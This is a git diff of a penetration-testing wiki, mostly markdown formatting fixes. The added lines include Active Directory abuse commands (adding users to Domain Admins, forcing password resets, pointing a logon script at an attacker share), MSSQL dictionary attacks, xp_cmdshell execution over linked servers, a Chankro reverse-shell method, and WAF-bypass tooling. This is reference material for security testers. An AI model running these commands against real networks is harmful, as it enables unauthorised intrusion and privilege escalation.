**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the**`LD_PRELOAD` trick + PHP `mail()`** function to execute the reverse shell.
Note that in order to use **Chankro**, `mail` and `putenv` **cannot appear inside the `disable_functions` list**.\
In the following example you can see how to **create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit** is going to be called **bicho.php** (that's the file you need to upload to the victims server):

2
src/network-services-pentesting/pentesting-web/put-method-webdav.md
View File

@ -58,7 +58,7 @@ Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a
## Post credentials
If the Webdav was using an Apache server you should look at configured sites in Apache. Commonly:\
\_**/etc/apache2/sites-enabled/000-default**_
_**/etc/apache2/sites-enabled/000-default**_
Inside it you could find something like:

2
src/network-services-pentesting/pentesting-web/special-http-headers.md
View File

@ -76,7 +76,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
## Conditionals
- Requests using these headers: **`If-Modified-Since`** and **`If-Unmodified-Since`** will be responded with data only if the response header\*\*`Last-Modified`\*\* contains a different time.
- Requests using these headers: **`If-Modified-Since`** and **`If-Unmodified-Since`** will be responded with data only if the response header**`Last-Modified`** contains a different time.
- Conditional requests using **`If-Match`** and **`If-None-Match`** use an Etag value so the web server will send the content of the response if the data (Etag) has changed. The `Etag` is taken from the HTTP response.
- The **Etag** value is usually **calculated based** on the **content** of the response. For example, `ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` indicates that the `Etag` is the **Sha1** of **37 bytes**.

2
src/network-services-pentesting/pentesting-web/spring-actuators.md
View File

@ -6,7 +6,7 @@
<figure><img src="../../images/image (927).png" alt=""><figcaption></figcaption></figure>
**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*
**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
## Exploiting Spring Boot Actuators

4
src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
View File

@ -32,7 +32,7 @@ Note that at the end of the code it's calling `this.QueryWorke(null)`. Let's see
Note that this isn't the complete code of the function `QueryWorker` but it shows the interesting part of it: The code **calls `this.InvokeMethodOnInstance(out ex);`** this is the line where the **method set is invoked**.
If you want to check that just setting the _**MethodName**_\*\* it will be executed\*\*, you can run this code:
If you want to check that just setting the _**MethodName**_** it will be executed**, you can run this code:
```java
using System.Windows.Data;
@ -61,7 +61,7 @@ Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.
Using the previous exploit there will be cases where the **object** is going to be **deserialized as** an _**ObjectDataProvider**_ instance (for example in DotNetNuke vuln, using XmlSerializer, the object was deserialized using `GetType`). Then, will have **no knowledge of the object type that is wrapped** in the _ObjectDataProvider_ instance (`Process` for example). You can find more [information about the DotNetNuke vuln here](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
This class allows to s**pecify the object types of the objects that are encapsulated** in a given instance. So, this class can be used to encapsulate a source object (_ObjectDataProvider_) into a new object type and provide the properties we need (_ObjectDataProvider.MethodName_ and _ObjectDataProvider.MethodParameters_).\
This is very useful for cases as the one presented before, because we will be able to **wrap \_ObjectDataProvider**_\*\* inside an \*\*_**ExpandedWrapper** \_ instance and **when deserialized** this class will **create** the _**OjectDataProvider**_ object that will **execute** the **function** indicated in _**MethodName**_.
This is very useful for cases as the one presented before, because we will be able to **wrap \_ObjectDataProvider**_** inside an **_**ExpandedWrapper** \_ instance and **when deserialized** this class will **create** the _**OjectDataProvider**_ object that will **execute** the **function** indicated in _**MethodName**_.
You can check this wrapper with the following code:

2
src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
View File

@ -82,7 +82,7 @@ So, to **avoid DoS** lets suppose that an **attacker will be using only 100 conn
Then, to generate **10000 files** an attacker would need: **`10000/66.67 = 150s`** (to generate **100000 files** the time would be **25min**).
Then, the attacker could use those **100 connections** to perform a **search brute-force**. \*\*\*\* Supposing a speed of 300 req/s the time needed to exploit this is the following:
Then, the attacker could use those **100 connections** to perform a **search brute-force**. Supposing a speed of 300 req/s the time needed to exploit this is the following:
- 56800235584 / 10000 / 300 / 3600 \~= **5.25 hours** (50% chance in 2.63h)
- (with 100000 files) 56800235584 / 100000 / 300 / 3600 \~= **0.525 hours** (50% chance in 0.263h)

4
src/pentesting-web/file-upload/README.md
View File

@ -43,7 +43,7 @@ Other useful extensions:
5. Add **another layer of extensions** to the previous check:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension\*\* _**.php**_**, but** not necessarily ending in .php\*\* will execute code):
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
- _ex: file.php.png_
7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)
8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
@ -176,7 +176,7 @@ Note that **another option** you may be thinking of to bypass this check is to m
- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
- [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)\*\*\*\*
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)

2
src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md
View File

@ -89,7 +89,7 @@ Usually the servers that will find on the internet that **convert LaTeX code to
This program uses 3 main attributes to (dis)allow command execution:
- **`--no-shell-escape`**: **Disable** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
- **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** \*\*commands (\*\*On Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
- **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** **commands (**On Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
- **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.
However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.

4
src/pentesting-web/rate-limit-bypass.md
View File

@ -54,6 +54,10 @@ If the target system applies rate limits on a per-account or per-session basis,
Note that even if a rate limit is in place you should try to see if the response is different when the valid OTP is sent. In [**this post**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732), the bug hunter discovered that even if a rate limit is triggered after 20 unsuccessful attempts by responding with 401, if the valid one was sent a 200 response was received.
### Tools
- [**https://github.com/Hashtag-AMIN/hashtag-fuzz**](https://github.com/Hashtag-AMIN/hashtag-fuzz): hashtag-fuzz is a fuzzing tool designed to test and bypass WAFs and CDNs. By leveraging advanced features such as random User-Agent and header value, random delays, handle multi-threading, selective chunking of wordlists and Round Robin proxy rotation for each chunked, it offers a robust solution for security professionals aiming to identify vulnerabilities in web applications.
{{#include ../banners/hacktricks-training.md}}

2
src/pentesting-web/registration-vulnerabilities.md
View File

@ -73,7 +73,7 @@ When registered try to change the email and check if this change is correctly va
### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

2
src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
View File

@ -50,7 +50,7 @@ SELECT * FROM dblink('host=127.0.0.1
### Port Scanning
Abusing `dblink_connect` you could also **search open ports**. If that \*\*function doesn't work you should try to use `dblink_connect_u()` as the documentation says that `dblink_connect_u()` is identical to `dblink_connect()`, except that it will allow non-superusers to connect using any authentication method\_.
Abusing `dblink_connect` you could also **search open ports**. If that **function doesn't work you should try to use `dblink_connect_u()` as the documentation says that `dblink_connect_u()` is identical to `dblink_connect()`, except that it will allow non-superusers to connect using any authentication method\_.
```sql
SELECT * FROM dblink_connect('host=216.58.212.238

2
src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
View File

@ -494,7 +494,7 @@ curl "$IDENTITY_ENDPOINT?resource=https://storage.azure.com/&api-version=2019-08
{{#tab name="PS"}}
```powershell
```bash
# Define the API version
$API_VERSION = "2019-08-01"

2
src/pentesting-web/unicode-injection/unicode-normalization.md
View File

@ -97,7 +97,7 @@ Notice that for example the first Unicode character purposed can be sent as: `%e
When the backend is **checking user input with a regex**, it might be possible that the **input** is being **normalized** for the **regex** but **not** for where it's being **used**. For example, in an Open Redirect or SSRF the regex might be **normalizing the sent UR**L but then **accessing it as is**.
The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows to **generate variation of the input** to fuzz the backend. Fore more info check the **github** and this [**post**](https://0xacb.com/2022/11/21/recollapse/).
The tool [**recollapse**](https://github.com/0xacb/recollapse) allows to **generate variation of the input** to fuzz the backend. Fore more info check the **github** and this [**post**](https://0xacb.com/2022/11/21/recollapse/).
## Unicode Overflow

2
src/pentesting-web/xs-search.md
View File

@ -613,7 +613,7 @@ According to [Chromium documentation](https://chromium.googlesource.com/chromium
Therefore if the **redirect URL responded is larger in one of the cases**, it's possible to make it redirect with a **URL larger than 2MB** to hit the **length limit**. When this happens, Chrome shows an **`about:blank#blocked`** page.
The **noticeable difference**, is that if the **redirect** was **completed**, `window.origin` throws an **error** because a cross origin cannot access that info. However, if the **limit** was \*\*\*\* hit and the loaded page was **`about:blank#blocked`** the window's **`origin`** remains that of the **parent**, which is an **accessible information.**
The **noticeable difference**, is that if the **redirect** was **completed**, `window.origin` throws an **error** because a cross origin cannot access that info. However, if the **limit** was hit and the loaded page was **`about:blank#blocked`** the window's **`origin`** remains that of the **parent**, which is an **accessible information.**
All the extra info needed to reach the **2MB** can be added via a **hash** in the initial URL so it will be **used in the redirect**.

2
src/pentesting-web/xs-search/README.md
View File

@ -614,7 +614,7 @@ According to [Chromium documentation](https://chromium.googlesource.com/chromium
Therefore if the **redirect URL responded is larger in one of the cases**, it's possible to make it redirect with a **URL larger than 2MB** to hit the **length limit**. When this happens, Chrome shows an **`about:blank#blocked`** page.
The **noticeable difference**, is that if the **redirect** was **completed**, `window.origin` throws an **error** because a cross origin cannot access that info. However, if the **limit** was \*\*\*\* hit and the loaded page was **`about:blank#blocked`** the window's **`origin`** remains that of the **parent**, which is an **accessible information.**
The **noticeable difference**, is that if the **redirect** was **completed**, `window.origin` throws an **error** because a cross origin cannot access that info. However, if the **limit** was hit and the loaded page was **`about:blank#blocked`** the window's **`origin`** remains that of the **parent**, which is an **accessible information.**
All the extra info needed to reach the **2MB** can be added via a **hash** in the initial URL so it will be **used in the redirect**.

2
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -157,7 +157,7 @@ server-side-xss-dynamic-pdf.md
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Note: A HTML comment can be closed using\*\*\*\*\*\***\***\*`-->`\*\***\***\*or \*\*\*\*\*\***`--!>`\*\*_
_**Note: A HTML comment can be closed using\*\***\***\*`-->`\*\***\***\*or \*\***`--!>`\*\*_
In this case and if no black/whitelisting is used, you could use payloads like:

4
src/pentesting-web/xxe-xee-xml-external-entity.md
View File

@ -37,7 +37,7 @@ In this attack I'm going to test if a simple new ENTITY declaration is working
Lets try to read `/etc/passwd` in different ways. For Windows you could try to read: `C:\windows\system32\drivers\etc\hosts`
In this first case notice that SYSTEM "_\*\*file:///\*\*etc/passwd_" will also work.
In this first case notice that SYSTEM "_**file:///**etc/passwd_" will also work.
```xml
<!--?xml version="1.0" ?-->
@ -164,7 +164,7 @@ Upon execution, the web server's response should include an error message displa
![](<../images/image (809).png>)
_**Please notice that external DTD allows us to include one entity inside the second (\*\***`eval`\***\*), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_
_**Please notice that external DTD allows us to include one entity inside the second `eval`), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_
### **Error Based (system DTD)**

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
View File

@ -246,7 +246,7 @@ Let's explain this final ROP.\
The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\
Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated.
**This way the exploit will execute a \_/bin/sh**\_\*\* shell.\*\*
**This way the exploit will execute a _/bin/sh**_ shell.**
![](<../../../../../images/image (143).png>)

4
src/reversing/reversing-tools-basic-methods/README.md
View File

@ -298,7 +298,7 @@ If you get the **binary** of a GBA game you can use different tools to **emulate
- [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra plugin
- [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidra plugin
In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_\*\* \*\* you can see how to press the Game Boy Advance **buttons**
In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_** ** you can see how to press the Game Boy Advance **buttons**
![](<../../images/image (581).png>)
@ -396,7 +396,7 @@ In the previous code you can see that we are comparing **uVar1** (the place wher
- Then, it's comparing it with the **value 8** (**START** button): In the challenge this checks is the code is valid to get the flag.
- In this case the var **`DAT_030000d8`** is compared with 0xf3 and if the value is the same some code is executed.
- In any other cases, some cont (`DAT_030000d4`) is checked. It's a cont because it's adding 1 right after entering in the code.\
**I**f less than 8 something that involves **adding** values to \*\*`DAT_030000d8` \*\* is done (basically it's adding the values of the keys pressed in this variable as long as the cont is less than 8).
**I**f less than 8 something that involves **adding** values to **`DAT_030000d8`** is done (basically it's adding the values of the keys pressed in this variable as long as the cont is less than 8).
So, in this challenge, knowing the values of the buttons, you needed to **press a combination with a length smaller than 8 that the resulting addition is 0xf3.**

2
src/reversing/reversing-tools-basic-methods/cheat-engine.md
View File

@ -150,7 +150,7 @@ A template will be generated:
![](<../../images/image (944).png>)
So, insert your new assembly code in the "**newmem**" section and remove the original code from the "**originalcode**" if you don't want it to be executed\*\*.\*\* In this example the injected code will add 2 points instead of substracting 1:
So, insert your new assembly code in the "**newmem**" section and remove the original code from the "**originalcode**" if you don't want it to be executed**.** In this example the injected code will add 2 points instead of substracting 1:
![](<../../images/image (521).png>)

50
src/windows-hardening/active-directory-methodology/README.md
View File

@ -36,6 +36,9 @@ To learn how to **attack an AD** you need to **understand** really good the **Ke
You can take a lot to [https://wadcoms.github.io/](https://wadcoms.github.io) to have a quick view of which commands you can run to enumerate/exploit an AD.
> [!WARNING]
> Kerberos communication **requires a full qualifid name (FQDN)** for performing actions. If you try to access a machine by the IP address, **it'll use NTLM and not kerberos**.
## Recon Active Directory (No creds/sessions)
If you just have access to an AD environment but you don't have any credentials/sessions you could:
@ -109,7 +112,7 @@ Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password
```
> [!WARNING]
> You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) \*\*\*\* and this one ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)).
> You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) and this one ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)).
>
> However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) to generate potential valid usernames.
@ -135,7 +138,7 @@ You might be able to **obtain** some challenge **hashes** to crack **poisoning**
### NTLM Relay
If you have managed to enumerate the active directory you will have **more emails and a better understanding of the network**. You might be able to to force NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) \*\*\*\* to get access to the AD env.
If you have managed to enumerate the active directory you will have **more emails and a better understanding of the network**. You might be able to to force NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) to get access to the AD env.
### Steal NTLM Creds
@ -215,7 +218,7 @@ It's very **unlikely** that you will find **tickets** in the current user **givi
If you have managed to enumerate the active directory you will have **more emails and a better understanding of the network**. You might be able to to force NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**
### **Looks for Creds in Computer Shares**
### Looks for Creds in Computer Shares | SMB Shares
Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).
@ -385,19 +388,19 @@ For example you could:
- Make users vulnerable to [**Kerberoast**](kerberoast.md)
```powershell
```bash
Set-DomainObject -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}r
```
- Make users vulnerable to [**ASREPRoast**](asreproast.md)
```powershell
```bash
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
```
- Grant [**DCSync**](#dcsync) privileges to a user
```powershell
```bash
Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdentity bfarmer -Rights DCSync
```
@ -561,9 +564,24 @@ Attackers with could access to resources in another domain through three primary
- **Foreign Domain Group Membership**: Principals can also be members of groups within the foreign domain. However, the effectiveness of this method depends on the nature of the trust and the scope of the group.
- **Access Control Lists (ACLs)**: Principals might be specified in an **ACL**, particularly as entities in **ACEs** within a **DACL**, providing them access to specific resources. For those looking to dive deeper into the mechanics of ACLs, DACLs, and ACEs, the whitepaper titled “[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)” is an invaluable resource.
### Find external users/groups with permissions
You can check **`CN=<user_SID>,CN=ForeignSecurityPrincipals,DC=domain,DC=com`** to find foreign security principals in the domain. These will be user/group from **an external domain/forest**.
You could check this in **Bloodhound** or using powerview:
```powershell
# Get users that are i groups outside of the current domain
Get-DomainForeignUser
# Get groups inside a domain with users our
Get-DomainForeignGroupMember
```
### Child-to-Parent forest privilege escalation
```
```bash
# Fro powerview
Get-DomainTrust
SourceName : sub.domain.local --> current domain
@ -575,6 +593,20 @@ WhenCreated : 2/19/2021 1:28:00 PM
WhenChanged : 2/19/2021 1:28:00 PM
```
Other ways to enumerate domain trusts:
```bash
# Get DCs
nltest /dsgetdc:<DOMAIN>
# Get all domain trusts
nltest /domain_trusts /all_trusts /v
# Get all trust of a domain
nltest /dclist:sub.domain.local
nltest /server:dc.sub.domain.local /domain_trusts /all_trusts
```
> [!WARNING]
> There are **2 trusted keys**, one for _Child --> Parent_ and another one for _Parent_ --> _Child_.\
> You can the one used by the current domain them with:
@ -622,7 +654,7 @@ More details on this can be read in [From DA to EA with ESC5](https://posts.spec
### External Forest Domain - One-Way (Inbound) or bidirectional
```powershell
```bash
Get-DomainTrust
SourceName : a.domain.local --> Current domain
TargetName : domain.external --> Destination domain
@ -641,7 +673,7 @@ external-forest-domain-oneway-inbound.md
### External Forest Domain - One-Way (Outbound)
```powershell
```bash
Get-DomainTrust -Domain current.local
SourceName : current.local --> Current domain

40
src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
View File

@ -96,13 +96,13 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.
```powershell
```bash
Import-Module .\PowerupSQL.psd1
````
### Enumerating from the network without domain session
```powershell
```bash
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
@ -118,7 +118,7 @@ Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Ver
### Enumerating from inside the domain
```powershell
```bash
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
@ -127,6 +127,12 @@ Get-SQLInstanceLocal | Get-SQLServerInfo
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
# Try dictionary attack to login
Invoke-SQLAuditWeakLoginPw
# Search SPNs of common software and try the default creds
Get-SQLServerDefaultLoginPw
#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
@ -141,11 +147,23 @@ Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" }
### Access DB
```powershell
```bash
# List databases
Get-SQLInstanceDomain | Get-SQLDatabase
# List tables in a DB you can read
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName DBName
# List columns in a table
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName DBName -TableName TableName
# Get some sample data from a column in a table (columns username & passwor din the example)
Get-SQLInstanceDomain | GetSQLColumnSampleData -Keywords "username,password" -Verbose -SampleSize 10
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
#Dump an instance (a lotof CVSs generated in current dir)
#Dump an instance (a lot of CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
# Search keywords in columns trying to access the MSSQL DBs
@ -157,7 +175,7 @@ Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" }
It might be also possible to **execute commands** inside the MSSQL host
```powershell
```bash
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
@ -178,7 +196,7 @@ If a MSSQL instance is trusted (database link) by a different MSSQL instance. If
### Powershell Abuse
```powershell
```bash
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
@ -210,6 +228,14 @@ Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_c
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
```
Another similar tool taht could be used is [**https://github.com/lefayjey/SharpSQLPwn**](https://github.com/lefayjey/SharpSQLPwn):
```bash
SharpSQLPwn.exe /modules:LIC /linkedsql:<fqdn of SQL to exeecute cmd in> /cmd:whoami /impuser:sa
# Cobalt Strike
inject-assembly 4704 ../SharpCollection/SharpSQLPwn.exe /modules:LIC /linkedsql:<fqdn of SQL to exeecute cmd in> /cmd:whoami /impuser:sa
```
### Metasploit
You can easily check for trusted links using metasploit.

26
src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
View File

@ -11,7 +11,7 @@ This privilege grants an attacker full control over a target user account. Once
- **Change the Target's Password**: Using `net user <username> <password> /domain`, the attacker can reset the user's password.
- **Targeted Kerberoasting**: Assign an SPN to the user's account to make it kerberoastable, then use Rubeus and targetedKerberoast.py to extract and attempt to crack the ticket-granting ticket (TGT) hashes.
```powershell
```bash
Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
.\Rubeus.exe kerberoast /user:<username> /nowrap
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose
@ -19,7 +19,7 @@ Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipal
- **Targeted ASREPRoasting**: Disable pre-authentication for the user, making their account vulnerable to ASREPRoasting.
```powershell
```bash
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
```
@ -29,7 +29,7 @@ This privilege allows an attacker to manipulate group memberships if they have `
- **Add Themselves to the Domain Admins Group**: This can be done via direct commands or using modules like Active Directory or PowerSploit.
```powershell
```bash
net group "domain admins" spotless /add /domain
Add-ADGroupMember -Identity "domain admins" -Members spotless
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
@ -48,7 +48,7 @@ If a user has `WriteProperty` rights on all objects for a specific group (e.g.,
- **Add Themselves to the Domain Admins Group**: Achievable via combining `net user` and `Add-NetGroupUser` commands, this method allows privilege escalation within the domain.
```powershell
```bash
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
```
@ -56,7 +56,7 @@ net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domai
This privilege enables attackers to add themselves to specific groups, such as `Domain Admins`, through commands that manipulate group membership directly. Using the following command sequence allows for self-addition:
```powershell
```bash
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
```
@ -64,7 +64,7 @@ net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domai
A similar privilege, this allows attackers to directly add themselves to groups by modifying group properties if they have the `WriteProperty` right on those groups. The confirmation and execution of this privilege are performed with:
```powershell
```bash
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
net group "domain admins" spotless /add /domain
```
@ -73,7 +73,7 @@ net group "domain admins" spotless /add /domain
Holding the `ExtendedRight` on a user for `User-Force-Change-Password` allows password resets without knowing the current password. Verification of this right and its exploitation can be done through PowerShell or alternative command-line tools, offering several methods to reset a user's password, including interactive sessions and one-liners for non-interactive environments. The commands range from simple PowerShell invocations to using `rpcclient` on Linux, demonstrating the versatility of attack vectors.
```powershell
```bash
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
Set-DomainUserPassword -Identity delegate -Verbose
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
@ -88,7 +88,7 @@ rpcclient -U KnownUsername 10.10.10.192
If an attacker finds that they have `WriteOwner` rights over a group, they can change the ownership of the group to themselves. This is particularly impactful when the group in question is `Domain Admins`, as changing ownership allows for broader control over group attributes and membership. The process involves identifying the correct object via `Get-ObjectAcl` and then using `Set-DomainObjectOwner` to modify the owner, either by SID or name.
```powershell
```bash
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
@ -98,7 +98,7 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
This permission allows an attacker to modify user properties. Specifically, with `GenericWrite` access, the attacker can change the logon script path of a user to execute a malicious script upon user logon. This is achieved by using the `Set-ADObject` command to update the `scriptpath` property of the target user to point to the attacker's script.
```powershell
```bash
Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
```
@ -106,7 +106,7 @@ Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\
With this privilege, attackers can manipulate group membership, such as adding themselves or other users to specific groups. This process involves creating a credential object, using it to add or remove users from a group, and verifying the membership changes with PowerShell commands.
```powershell
```bash
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose
@ -118,7 +118,7 @@ Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'use
Owning an AD object and having `WriteDACL` privileges on it enables an attacker to grant themselves `GenericAll` privileges over the object. This is accomplished through ADSI manipulation, allowing for full control over the object and the ability to modify its group memberships. Despite this, limitations exist when trying to exploit these privileges using the Active Directory module's `Set-Acl` / `Get-Acl` cmdlets.
```powershell
```bash
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
